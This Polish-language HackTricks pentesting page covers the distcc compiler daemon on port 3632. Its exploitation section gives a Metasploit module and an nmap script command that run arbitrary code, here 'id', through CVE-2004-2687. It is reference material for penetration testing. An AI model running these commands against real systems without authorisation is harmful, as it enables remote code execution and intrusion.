hacktricks/src/network-services-pentesting/3632-pentesting-distcc.md

31 lines
1.2 KiB
Markdown

{{#include ../banners/hacktricks-training.md}}
# Podstawowe informacje
**Distcc** to narzędzie, które poprawia **proces kompilacji**, wykorzystując **nieużywaną moc obliczeniową** innych komputerów w sieci. Gdy **distcc** jest skonfigurowany na maszynie, ta maszyna jest w stanie rozdzielać swoje **zadania kompilacji** do innego systemu. Ten system odbierający musi mieć uruchomiony **demon distccd** i musi mieć zainstalowany **kompatybilny kompilator**, aby przetworzyć wysłany kod.
**Domyślny port:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Wykorzystanie
Sprawdź, czy jest podatny na **CVE-2004-2687**, aby wykonać dowolny kod:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Nie sądzę, żeby shodan wykrywał tę usługę._
# Resources
- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post stworzony przez **Álex B (@r1p)**
{{#include ../banners/hacktricks-training.md}}